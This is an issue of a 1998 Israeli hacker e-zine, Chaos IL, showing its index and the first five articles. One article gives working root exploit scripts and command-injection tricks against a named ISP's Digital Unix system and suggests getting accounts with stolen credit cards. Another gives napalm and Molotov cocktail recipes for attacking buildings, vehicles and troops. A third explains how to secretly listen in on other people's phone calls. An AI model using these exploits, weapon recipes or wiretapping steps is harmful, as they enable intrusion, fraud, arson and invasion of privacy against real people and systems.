Copy Link
Add to Bookmark
Report
Chaos IL Issue 03
< The Israeli Underground Information eXchage >
,
Ú ,g,___.,,Úg?Pü~ g¿,,,.
g.,gd$Pü''~``'4${ ,, ,,._ __..,, _.,._}$$$$%'
'ü4$$b, ' gÚÚ,.. :} :}"üP#g,. ,yPü~"ü4Py. ,gP'~"üü"~`
'$$$b. ~ü4$$4 }$ }$ `$$b: d$} }$b,%%}
:$$$% ~$$i _.,, iiÚÚ,, `4$%%%?W, ;$$} $$; ,
.}$$$P g¿,,,. .}$$b#Pü"}: Ã$~"ü4 `$$b.`4?g,,.,g?Pü` ;?W,.,,Úg?Pü~
,dPü"' .,._}$$$$%':d$$' $}g4: `$$$b. `~}}~`` `4?~``'4${
'' ,gP'``~"üü"~` ,$$P' iiü' .'Pü~' ,d$P'
'' .d$$' $} ,g, --IL d$$P'
'' '~ü4` :4g, `ü' .,,, {$$$
.. / `ü' '?${_.,, `üPb,
jizm#@ 'ü"~``'4g, ``
''
''
Chaos IL - Issue #3, 13/Apr/1998 ..
,,
Oi! ~If freedom is outlawed, only outlaws will have freedom~ Oi!
Chaos IL Issue Three Index:
~~~~~~~~~~~~~~~~~~~~ ~~~~~~
01. Introduction to Issue #3 (NEWS) by morpher
02. The Trendline Hack - DIGITAL UNIX V4.0 by Captain Black
03. Hacking the IRIS OS by morpher
04. How to make an improved Incendary Bottle by Molotov
05. Tap into Bezeq's CALL WAITING service by Terminal Man
*06. Guide to Bezeq's Extenders and PBXs by TS / Bezeq
07. Stuff you didn't knew about The Analyzer by OXiD
08. Getting around with newbie Hacking by F0X
09. Phun quotes from #chaos-il *
10. Setting your own VMB in Trilog PhoneMail Systems by morpher
11. TeleCards resetting by OXiD
12. Resources & Credits Chaos-IL
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
***
01. Introduction to Issue #3
###### ## ## ###### ####### ######## #### ##
## ## ## ## ## ## ## ## ## ##
## ####### ###### ## ## ######## ## ##
## ## ## ## ## ## ## ## ## ##
###### ## ## ## ## ####### ######## #### ########
Issue #3
(c) Chaos-IL Foundation 1998
Note from morpher (morpher@netlimit.com):
Welcome to Chaos-IL issue #3! I'm sorry it was a kind of delay until this new
issue came out... but if you'll take a brief look on the issue you'll see
it was worth waiting :). First time we actually have a special guest directly
from Bezeq, who gave us an article that answer all the questions that came
up lately about Bezeq's PBXs and Extenders. If you're currently using a PBX
or an Extender, or even if you are about to use, please make sure to read this
before begining so you'll know the risks :P
I've said it once and I'll say it again, if you think you have any kind of
interesting, new and original information that you would like to write about,
email it to us, and we might include it in the incoming issue. The fact
someone writes doesn't means he is a member, he's just another guy who wants
to share the information he got in hands.
It has been over a month since our last issue release and there have been
some major updates going on. Chaos-IL became much bigger then what we ever
expected it to be and it's keep getting bigger even, checkout our current
member list for more info.
Contact info updates:
NEW- You may now leave voice messages to Chaos-IL at morpher's VMB:
177-022-3370 (dont bullshit my brain...bahh)
UPDATE- Our homepage was re-designed and updated, thanks to Fourth Horseman.
http://www.liquid98.com/chaos-il/
IRC CHANNEL- Our IRC channel is now public on the EFnet - #chaos-il
morpher.
_____________________________________________________________________________
Chaos-IL primary members:
morpher morpher@netlimit.com
Captain Black capblack@unixgods.com
Mr. Freeze mr_freeze@idc.co.il
squish
Dissection orphaned_land@hotmail.com
Easy K_O_C@hotmail.com
The Trick trick@mindless.com
OXiD transzen@hotmail.com
skade
Terminal Man terman@hotmail.com
MOONCHiLD m00nchild@mosad.org
malder sharky@hotmail.com
Molotov molotov@hotmail.com
Jekyll wwsuicide@hotmail.com
The Errormaker
Fourth Horseman 4thm@liquid98.com
Members can be reached via eMail (also see in article's buttom).
Applications, feedbacks, corrections, support, will done at:
morpher@netlimit.com
How to retrieve Chaos IL
~~~~~~~~~~~~~~~~~~~~~~~~
Chaos IL Issues will be regulary available once released in these fine boards:
Liquid Underground +972 (0)3-9067029
Kaos On Compton +972 (0)8-8524603
The Orphaned Land +972 (0)8-9422043
Chaos IL is also regulary in the following anonymous sites:
ftp.fc.net /pub/phrack/underground/chaos-il/
ftp.auscert.org.au /pub/emags/chaos_il/
* Israeli sites will be also available soon.
You can also:
-Join our IRC channel at EFFNet: #chaos-il
-Look out the Web at: http://www.liquid98.com/chaos-il/
***
02. The Trendline Hack - DIGITAL UNIX V4.0
$ THE TRENDLINE HACK $
by Captain Black
(c) Chaos-IL Foundation 1998
Trendline Hack Introduction
---------------------------
Trendline is an old Internet Service Provider company in the Internet fields
of Israel. Different from some of the other ISPs in Israel, Trendline is
an Hacker-friendly ISP. Trendline gives us almost everthing possible to:
-Hack them (Root them)
-Fraud thier accounts billing
-Flood them (simply)
-Hack thier webpage
-Abuse thier IRC users
Though all those, I'll be dealing with one thing rightnow: Hacking them,
or in other words, gaining root on thier system.
Trendline router is used on Digital Unix 4.0 Operating System, which is
known as a hell of holed system (pretty stupid to run a router on it).
In this article I exampled and described all the operations and high level
techniques you may use to gain root on thier system, though its a
regular DG/UX 4.0 as the others, Trendline's system has a few holes that
are specialized for thier host.
--
In order to try/excute all of the below techniques, you must have a trendline
account. Trendline accounts are easy to get on the public, or you can card
yourself one with a valid full-detailed credit card info. (you might want
to take a look at the PPA accounts carding article in Chaos-IL #2)
Trendline support number: 03-6388222 (use this to card)
After you are equiped' with account, access thier UNIX system through
the main host at trendline.co.il , or if you are fimilar with X.28 / X.25
routers you may make your work easier and access them through the escape
key ('^]') after you entered username (no password) for ppp mode.
/\NOTE/\
I'm writing this article as I'm assuming you are basically fimilar with UNIX,
so I wont start detailing every little command and technical step.
and YES, I did Hacked Trendline with one of the techniques listed below.
***************************************************************************
Local techniques
----------------
The first thing to try is the IFS hole in /usr/sbin/dop. If dop is setuid
root, there is a good chance that you can gain root this way. Here is a
shell script :
----------------------------------------------------------------------------
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS=" "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
----------------------------------------------------------------------------
After running this shell script, if it works, your euid should be 0. Your
prompt may or may not change depending on which shell you are using, so do
an id and check. That is a old sploit that most competent admins have
probably fixed.
Digital Unix has a large problem in the way that it handles core dumps of
setuid root programs. If you can get a setuid root program to dump core,
it will create the core file as root, and it will follow symlinks. So,
how can we exploit this? I noticed a long time ago that if you run dbx
on a setuid root program that you have read access to, then it will core dump
in your current directory. Dbx is a debugger that comes with digital unix.
However, some times machines won't have the liscence files installed
correctly. Here is the exploit :
----------------------------------------------------------------------------
#!/bin/sh
# dbx exploit by humble
# works on Digital Unix 4.x
# this overwrites /.rhosts
mkdir /tmp/.testing
cd /tmp/.testing
ln -s /.rhosts core
BOB="
+ +
"
export BOB
dbx /bin/crontab
dbx /bin/crontab
dbx /bin/crontab
rm -rf /tmp/.testing
rsh -l root localhost /bin/sh -i
----------------------------------------------------------------------------
If /bin/crontab is not setuid root or you don't have read permissions to
it, you can use any other setuid root program.
Ok. If that doesn't work, there is another core dump situation I have
found. I have only verified this on three machines and have been told
that it hasn't worked on one or two others. The program /usr/X11/bin/dxpause
is a screen locker. I found that when I run that program, and have my
DISPLAY set to my freebsd or my linux box (running xfree86), the program
will dump core as root. Be carefull though, if the program doesn't dump
core, you will have to enter the password of the person who's account
you are using. You have to set up your X server to allow connections from
the target, and you will probably have to click once on your machine to
get the program running on the Trendline's Digital Unix box to crash.
Anyway, this can be exploited in a similair fashion to the dbx problem.
There is another core dump that was mentioned on Bugtraq by Tom Leffingwell,
but I haven't been able to re-create it. Here is excerpts from his posting:
----------------------------------------------------------------------------
Version Affected: Digital UNIX 4.0B *with* patch kit 5
Unpatched 4.0B is not vunerable to this particular
problem, but it is to others.
Patch kit 5 included a replacement xterm because the old one had a bug, too.
They replaced it with another that had a bigger problem. You can cause a
segmentation fault in xterm simply by setting your DISPLAY variable to a
display that you aren't allowed to connect to or one that doesn't exist.
Start xterm, and you get a core file.
----------------------------------------------------------------------------
Ok, core dumps not working? Don't worry.. there's more to Trendline.
There has been some talk about holes in dtappgather on the security mailing
lists. We can use one of the holes to our advantage as well.
Using dtappgather, we can make any file on the system owned by us. This is
obviously a good way to take over a machine. Exploit:
env DTUSERSESSION=../../../../../../../../etc/passwd /usr/dt/bin/dtappgather
and /etc/passwd is now owned by us. This could be used to gain control of
/etc/inetd.conf and just about anything else you could imagine. I haven't
used this exploit to mess around with the /tcb/files/auth/* tree, but I
would be willing to bet it is very successfull.
I've also noticed that the X server setup on some Digital Unix boxes are
insecure. If you have a shell on the machine, try to set your DISPLAY to
localhost:0 or the machines hostname:0, and then run a program like xkey.
Here are some exploits that I havent used or tried before (edited a little):
----------------------------------------------------------------------------
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
==========================
H0l4. So here it is another bug for Digital
System: OSF1 my.narco-goverment.sucks.co V4.0 464 alpha
Program: fstab - Static information about file systems and swap partitions
advfsd - Starts the AdvFS graphical user interface daemon
Problemo: It creates a lockfile in tmp with nice permitions :)
/tmp>ls -la
(Blah Blah Blah.....)
-rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile
What the hell to do with it:
Before it creates
ln -s /.rhosts /tmp/fstab.advfsd.lockfile
from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.
The End - El Fin
Colombia 1997.
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
Efrain 'ET' Torres
----------------------------------------------------------------------------
This if for Digital Unix 3.x (I've never seen it work.)
$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0 (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username
and anything for the passwd. You'll get a permission denied
message and the window will close.)
$ ls -l /hackfile
-rw------- 1 root system 0 Nov 16 22:44 /hackfile
----------------------------------------------------------------------------
Remote techniques
-----------------
I don't have too much here except one pretty big hole. Digital Unix 4.x
is blind ip spoofable!!! So, if you can guess or determine a trust
relationship, the machine is yours. Also, when the CERT statd advisory
came out, Digital released a patch. I haven't played around with that, but
it might be worth looking into.
Also, Digital Unix 4.0 sometimes has an 0wned finger daemon, try this..
% finger Ý/bin/w@host
if this gives uptime info etc, it shows the system is vulnerable to this
attack, you can specify any command.. simple to use.
Captain Black.
____________________________________________________________________________
***
03. Hacking the IRIS OS
/---/---/---/---/---/---/---/---/---/---/---/
Hacking the IRIS/OS
/---/---/---/---/---/---/---/---/---/---/---/
by morpher
Chaos IL
IRIS R9.1.3A Introduction
Hello Everybody, Here is some info on a relatively old System called IRIS or
Interactive Realtime Information Service. This system was originally meant
to run on older systems like PDP-8 and PDP-11. Due to the versatile nature
of IRIS, today a lot more systems run it. IRIS systems usually can be reached
at 1200 7E1 and after pressing either ESCape or Enter a few times, you should
see something like this as a greet:
-=-
Welcome to "IRIS" R9.1.3A timesharing !
ACCOUNT ID ?
-=-
Or sometimes it will say what you have reached under the welcome line. IRIS
is also extremely hacker-friendly as it will let you type account names for
as long as you want. Also when you guess an account there are no passwords on
them. At first you will not see what you type, to change this type Control-E
to turn the echo on. Try CAPSLOCK also.
-=-
DEFAULT ACCOUNTS
----------------
MANAGER (Good System Access)
NO NAME (Normal User)
DEMO (Try the other ones first)
PDP8 /
PDP11 < == All General Accounts
SOFTWARE \
Hopefully you're in there with one of those accounts. Now, then you will get
a # prompt. If you are on with an account of access level 3, then you will
be able to use a user maintanencer program, by typing either ACCOUNTS or
ACCOUNT UTILITY. You should get:
-=-
(0) EXIT TO SYSTEM
(1) ADD NEW ACCOUNT
(2) MODIFY ACCOUNT
(3) DELETE ACCOUNT
(4) INQUIRE ACCOUNT
(5) LIST THE ACCOUNTS
Ah, I wasn't able to create an account, but I did modify several. Basically
this is pretty straight forward.
-=-
Ok, after you're done playing with the accounts and exit properly there are
a lot of interesting features on this IRIS. On one particular system that I
use often you have several utilities such as spreadsheets, word processors
and even an ASM program. You can get a list of all the things to do by typing
LIBR at the # prompt. most of the filenames you type the response will be
"NOT A PROCESSOR", Since most of the IRIS software was written is business
BASIC. Type BASIC LOAD <Filename>. Here are some of the most interesting
programs.
PP or PORT ALL MONITOR will let you see who else is using the system. if
for some reason you want to kick off a user, type PPP and then the user name.
Also if you want to see your own status type PROT.STAT
If you need help with something try typing GUIDE and it will give you a short
menu of all the help files available. Too bad there usually isn't many.
Another interesting utility to use is BLOCKCOPY, since I am not completely
used to it, I will show you what the guide said:
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
ENTER TOPIC # 1
INTRODUCTORY COMMENTS ON USING BLOCKCOPY
PRINT HERE OR $LPT (C/R OR $) :
INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY
INTRODUCTION
BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT
FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF
ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER.
BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY
USEFUL IN SPECIAL CASES. EXAMPLES:
1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER,
WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE
DESTINATION.
2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE
DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL
UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN
BE SET ASIDE AS A DEDICATED SYSTEM BACKUP.
3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED
UP TO AND RESTORED FROM OTHER STORAGE MODULES.
PRESS RETURN WHEN READY TO GO ON
LIMITATIONS
NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER
TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER
IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS.
ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH
PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK.
SETUP
FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK.
NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE
FOR THE BZUD POINTER.
ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU.
FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING
YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR
DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE
AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER.
PRESS RETURN WHEN READY TO GO ON
NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED.
ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL.
ENTER THE FOLLOWING VALUES FOR THE SOURCE:
ADDRESS OF THE SOURCE BZUD : 0
COMPUTED VALUE OF SOURCE PHYU : 0
STARTING CYLINDER NUMBER : 0
BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0)
THIS IS NORMALY ZERO : 0
SOURCE CONTROLLER'S DEVICE CODE : 0
SOURCE DISC'S LRC : 0
NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0
ENTER THE FOLLOWING VALUES FOR THE DESTINATION:
ADDRESS OF THE DESTINATION BZUD : 0
COMPUTED VALUE OF DESTINATION PHYU : 0
STARTING CYLINDER : 0
BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0
DESTINATION CONTROLLER'S DEVICE CODE : 0
PRINT HERE OR $LPT (C/R OR $) : 0
RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND:
#SHUTDOWN <CTRL-E>[PASSWORD]<CTRL-E> BLOCKCOPY @73000,X73000
USE DBUG TO SET UP THE FOLLOWING LOCATIONS:
200 : 0
201 : 0
202 : 0
203 : 0
204 : 0
205 : 0
206 : 0
207 : 0
210 : 0
211 : 0
212 : 0
213 : 176346
PRESS RETURN WHEN READY TO GO ON 0
THEN J410 (OR RESET & START AT 410) TO START THE COPY
RULES FOR BLOCKCOPY:
ADDRESS FUNCTION
400 BAD HALT
401 NOT USED
402 NOT USED
410 START COPY
411 START VERIFY
412 START DISC PATTERN GENERATOR
413 START DISC PATTERN VERIFICATION
414 RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS
415 SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST
416 START INFINITE DISC PATTERN TEST
PRESS CR TO CONTINUE DISPLAY OF RULES
HALTS:
63077 INDICATES A SUCCESSFUL COMPLETION
63377 WRONG VALUE(S) IN TABLE STARTING AT 200
67077 READ ERROR
73077 WRITE ERROR
63277 VERIFY ERROR IN CORE COMPARE
ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS:
260 = CURRENT SOURCE RDA
261 = CURRENT DEST RDA
262 = CURRENT DISC STATUS
NO AUTOMATIC RETRIES ARE DONE.
ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE)
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
-=-
Also you can edit individual text files and configuration files
by text editors. The names of this shit is different on all the systems
I've called.
-=-
CONCULSION
I hope this serves a useful purpose.. I still can't understand why IRIS is
extremely easy to use, and very common.. yet, I haven't seen any good
articles on it in the previous issues of chaos-il.
morpher.
================================================================================
04. How to make an improved Incendary Bottle
Chaos-il's NEW Anarchy Division
*******************************
Article #1 How to make an improved Incendary Bottle
________________ (aka, Molotov Cocktail) ___________
By: Molotov
Incendary Bottles, popularly known as Molotov Cocktails are used
to start fires in buildings or as weapons against vehicles or troops.
A Molotov Cocktail is nothing more than a glass bottle or jar which has been
filled with gasoline and plugged with a gas-soaked rag in the end. When the
rag is lit and the bottle is thrown, the gasoline is ignited and spreads a
sheet of flame.
More effective Molotov Cocktails can be made by using homemade napalm
instead of gasoline. For those of you who don't know, napalm is simply gelled
gasoline which burns hotter than regular gasolne and clings to whatever it
splatters on!
Now, on with the napalm... Napalm can be made in several easy ways.
The easiest method is to mix 36 parts by volume of gasoline with 1 part of
100-proof alcohol (whiskey or vodka) and 25 parts soap flakes. Only real soap
such as Ivory or Palmolive soap bars can be used. Detergent will NOT work.
Put the gasoline in a bucket or other container and add the alcohol.
Stir the soap flakes in slowly until the gasoline sets in a thick gel.
After standing for a few days, the mixture will have the consistency of butter.
If necessary, it can be thinned by adding more gasoline.
Gasoline can also be gelled with egg whites and any of the following
additives: instant coffee, sugar, Epsom salts, baking soda, or salt. To make
napalm, place the gasoline in a bucket and add 1 part of egg whites to every
6 parts of gasoline. Slowly add the coffee, sugar or some other suitable
material until the gasoline gels to the consistency of jam. This version of
napalm breaks down quickly and should be used within 24 hours.
Have fun!
05. Tap Bezeq's CALL WAITING service
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Tap Bezeq's CALL WAIT service +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ by Terminal Man +
+++++++++++++++++++++++++++++++++++++++++++++
++ Chaos IL ++
So, you have an enemy who talks behind your back, eh? Or, maybe you just
would like to "listen" in on your friend's conversations? Well, if you have 2
phone lines and call waiting on one of them, you are in luck. (Only one
problem: your friend must also have call waiting!)
Procedure:
[1] Call up your friend with the phone you want to listen with. When he
answers call waiting (he's already on the phone, and you are the 2nd caller),
then you either sit there or say: sorry, I have the wrong #.
[2] Next, you wait until he goes back to the other line (puts you on hold).
[3] Then, pick up your other line and call ->YOUR<- call waiting.
[4] Answer call waiting
[5] Then go back to him. (Answer, and then click back.. Click ->2<- times
answer, and go back..)
[6] Hang up your second line
[7] You are now on the line!
[8] Listen and be Q U I E T !
He can hear you!
Techniques I use to prevent noise or confusion:
If you have call forwarding, turn it on and forward calls somewhere before you
start listening. If a call comes through on your call waiting circuit,
the people talking (your buddie and his pal) will not hear anything,
but after you answer call waiting and come back, they will hear the other
call hang up (two clicks). If you don't have call forwarding, I suggest you
get it if you are going to make a habit of this, because it will become
a major pain in the ass. When your call waiting rings, you are removed
from the "listening" conversation and placed back on his hold circuit.
In order to get back on, you must answer the phone and wait for your party
when you answer the phone, tell the guy you are in a hurry and you have to go
or you'll call him back later or something) to hang up. When he or she hangs
up, you will be back on the conversation. Then, one of your pals will
say: What was that? (because of the clicks).. So, try to use call forwarding
if you can. Remember: Have fun, and don't abuse it. I am not sure about it,
because I just discovered it. It is illegal (what isn't these days) because
it is invading privacy". I don't know if Bezeq opers just did not realize
there was a flaw in it, or that was planned for line testing, I am not sure.
Have phun...